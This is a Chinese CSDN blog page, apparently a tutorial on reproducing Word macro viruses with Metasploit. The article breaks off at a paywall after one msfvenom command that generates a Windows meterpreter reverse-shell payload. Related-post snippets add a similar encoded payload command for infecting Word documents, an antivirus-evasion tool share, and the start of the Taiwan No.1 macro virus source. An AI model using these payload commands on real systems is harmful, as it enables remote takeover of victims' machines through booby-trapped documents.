宏病毒复现

最新推荐文章于 2024-08-20 18:48:02 发布

TUANZI_Dum

最新推荐文章于 2024-08-20 18:48:02 发布

阅读量1k

点赞数 1

本文链接：https://blog.csdn.net/qq_23066945/article/details/102986019

版权

宏病毒复现

1、简单讲讲宏病毒

百度：宏病毒是一种寄存在文档或模板的宏中的计算机病毒。一旦打开这样的文档，其中的宏就会被执行，于是宏病毒就会被激活，转移到计算机上，并驻留在Normal模板上。从此以后，所有自动保存的文档都会“感染”上这种宏病毒，而且如果其他用户打开了感染病毒的文档，宏病毒又会转移到他的计算机上。

运行成功能够直接getshell

2、msf生成宏病毒

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.1(当前主机的ip) lport=6666（当前主机端口） -f v

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

TUANZI_Dum

关注关注

1
点赞
踩
8

收藏

觉得还不错? 一键收藏
1
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

[网络安全自学篇] 七十三.WannaCry勒索病毒复现及分析（四）蠕虫传播机制全网源码详细解读

杨秀璋的专栏

05-05

1万+

这是作者网络安全自学教程系列，主要是关于安全工具和实践操作的在线笔记，特分享出来与博友们学习，希望您喜欢，一起进步。前文分享了逆向分析OllyDbg动态调试工具的基本用法，包括界面介绍、常用快捷键和TraceMe案例分析。这篇文章将继续详细讲解WannaCry蠕虫的传播机制，带领大家详细阅读源代码，分享WannaCry勒索病毒是如何传播感染的。作者分析该病毒一个月，一方面觉得自己技术菜，另一方面深知系统安全需要坚持，继续加油。希望文章对您有所帮助~

MSF利用宏病毒感染word文档获取shell复现

永远是少年

06-14

2224

1 条评论您还未登录，请先登录后发表或查看评论

使用宏病毒反弹shell

qq_42671480的博客

05-23

938

宏病毒是一种寄存在文档或模板的宏中的计算机病毒。一旦打开这样的文档，其中的宏就会被执行，于是宏病毒就会被激活，转移到计算机上，并驻留在Normal模板上。从此以后，所有自动保存的文档都会“感染”上这种宏病毒，而且如果其他用户打开了感染病毒的文档，宏病毒又会转移到他的计算机上。那么，宏病毒是如何产生的呢？准备环境 kali 攻击机 win7 靶机生成payload 使用kali虚拟机，输入以下...

钓鱼的常见几种方式

最新发布

qq_55894976的博客

08-20

1126

【代码】钓鱼的常见几种方式。

使用Kali Linux Metasploit 复现 word宏

xujing19920814的博客

10-01

1586

使用Kali Linux Metasploit 复现宏

宏病毒分析要点

weixin_42539095的博客

12-26

555

练习过一些宏病毒，总结一些最基本的方法一．查看提示启用内容，选择启用 Alt+F11即可查看宏代码二.加密部分宏加了密码可以用如下工具破解三．快速查找关键语句大量简单的宏病毒直接在代码中搜索shell或者run即可找到关键的执行部分Ctrl+F，输入shell或者run查找，找到后下断点执行过来选择左侧点击即可下断然后运行本地窗口查看，调试添加监视即可看到关键部...

WPS Office宏病毒实现shell反弹

Zyecho的博客

10-21

2801

WPS Office宏病毒实现shell反弹

EXCEL startup.exe 宏病毒

weixin_34411563的博客

11-13

207

StartUp.xls宏病毒清除方法第一步：清除C:\Documents and Settings\administrator\Application Data\Microsoft\Excel\XLSTART下的StartUp.xls；第二步：清除C:\Documents and Settings\administrator\Application Data\Micr...

关于使用Cobalt Strike制作宏病毒

m0_52027565的博客

07-08

1997

关于使用Cobalt Strike制作宏病毒 事情的起因经过是这样的，那天晚上我正在埋头学习，突然小A走了过了，过来说他喜欢班花小B很久了，我一脸不相信的看着他，好家伙，竟然忍了整整一年，大一不表白，现在晚了吧？我看来看小A心想这小子突然开窍了吗？结果现实给了我一巴掌，小A说大一就想表白了，可他自己不确定小B到底喜不喜欢他，就一直拖着，直到大二。想让我帮忙查查小B的喜好，然后“投其所好”直接表白。我看在他一年单相思（不对是烧烤+啤酒）的份上，不忍心看着他单着，于是同意帮小A帮查查小B的喜好。...

[系统安全] 二十五.WannaCry勒索病毒分析 (1)Python复现永恒之蓝漏洞实现勒索加密

杨秀璋的专栏

02-27

1万+

作者前文介绍了逆向分析之OllyDbg动态调试工具，包括INT3断点、反调试、硬件断点和内存断点。这篇文章将分享新知识，最近WannaRen勒索软件爆发（下图是安天的分析攻击流程），其名称和功能与WannaCry相似，所以接下来作者将连续分享WannaCry勒索病毒的复现及分析，第一篇文章将采用Github资源实现永恒之蓝漏洞利用及Windows7系统文件加密。希望这系列文章对您有所帮助，漫漫长征路，偏向虎山行。享受过程，一起加油~

过360云查杀工具(免杀工具)

03-14

过360云查杀工具点击后自动隐藏有可能被杀软防火墙误报病毒木马请关闭杀软防火墙后重试给大家分享下密码 123

利用宏感染 word 文档获取windows系统的 shell

Cwillchris的博客

05-27

387

利用宏感染 word 文档获取window的 shell 实验环境： kali攻击机（192.168.98.30） window目标机（192.168.98.35） office 2016 实验步骤： 1、生成后门 msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.98.30 LPORT=5555 -e x86/shikata_ga_nai -i 10 -f vba-ex

利用MHT类型，免杀宏病毒

Sven的忘却日记

03-04

1963

首先使用Word创建一个利用宏代码弹MsgBox的样本，如下图：保存内容后，另存为MHT格式文件文件内容如下：此时，再使用一些常用的ole分析工具，就识别不了这个类型了，比如正常的word文档可以使用压缩软件查看一些ole内部结构相关的数据正常的word文档，使用7z查看问题就在，如过把刚刚的2.mht 改成2.doc，完全不影响宏执行 ...

宏病毒(1)

WLINX

12-09

620

样本HASH：02BA9703D1F250B411EA4C868D17FD2E 先打开样本，发现是老版的宏警告。然后点击启用宏，ALT+F11查看宏代码(打开之前可以按住shift，防止一切宏运行，但很多时候不好使)，然后找到宏开始的地方，然后开始调试。 CTRL+F8运行到光标处，然后F8开始单步。 Sub userNaveLoadr() Dim path_Nave...

脚本/宏病毒

flowerxxxxx的博客

06-30

676

一旦发现计算机Office软件打开后弹出系统警告框，并且无法“另存为”，就表示该文件已感染宏病毒，此时不能再打开其他文件，否则病毒也会感染，应马上关闭删除该文件。（3）用Win Hex分别打开notepad.exe和notepad_upx.exe文件（2分），再比较PE头部分，用语言描述有什么不同。在“受信任位置”中，删除“可靠来源”列表框中的不安全来源，根据实际情况设置是否信任所有安装的加载项和模板，设置宏的安全性；（3）描述清除病毒及加固的方法；（注：直接答在该题下面）（5分）

Word宏病毒

热门推荐

qq_43717119的博客

06-22

1万+

Word宏病毒【实验目的】 1、演示宏的编写。 2、说明宏的原理及其安全漏洞和缺陷。 3、理解宏病毒的作用机制，从而加强对宏病毒的认识，提高防范意识。【实验环境】在windows虚拟机中演示word宏病毒的发生机制，以及如何清除病毒的一系列操作宏病毒样本：自我复制及感染病毒(copy.txt)类台湾一号病毒(No1.txt) 实验注意事项：为了保证该试验不至于造成较大破坏性，进行实验感染后，被感染终端不要打开过多的word文档，否则清除比较麻烦（对每个打开过的文档都要清除）。【实验预备知识点】 Wo

恶意代码实验3：Word宏病毒实验

qq_63949327的博客

11-21

2148

只要下次打开这个word文档，就会执行以上代码，并将自身复制到Normal.dot（word文档的公共模板）和当前文档的ThisDocument中，同时改变函数名（模板中为Document_Close，当前文档为Document_Open），此时所有的word文档打开和关闭时，都将运行以上的病毒代码，可以加入适当的恶意代码，影响word的正常使用，本例中只是简单的跳出一个提示框。回答不正确三次，即可自动跳出病毒程序，但那时已经出现几十个文档。1、打开的宏编辑器如图所示，即可编写病毒代码。

台湾一号宏病毒原始源代码

家有恶妻请勿靠近

08-01

7721

Taiwan No.1 病毒原始码 Dim Shared nm(4) Sub MAIN DisableInput 1 If Day(Now()) = 13 Then try: On Error Goto 0 On Error Goto try test = - 1 con = 1 tog$ = "" i =

Excel宏病毒分析与研究

"这篇资源涉及的是Excel中的VBA（Visual Basic for Applications）宏代码，它可能包含一种病毒的形式，主要用于研究目的。宏是Excel中的一种自动化工具，可以通过编写VBA代码来实现对Excel工作簿的各种自定义操作。...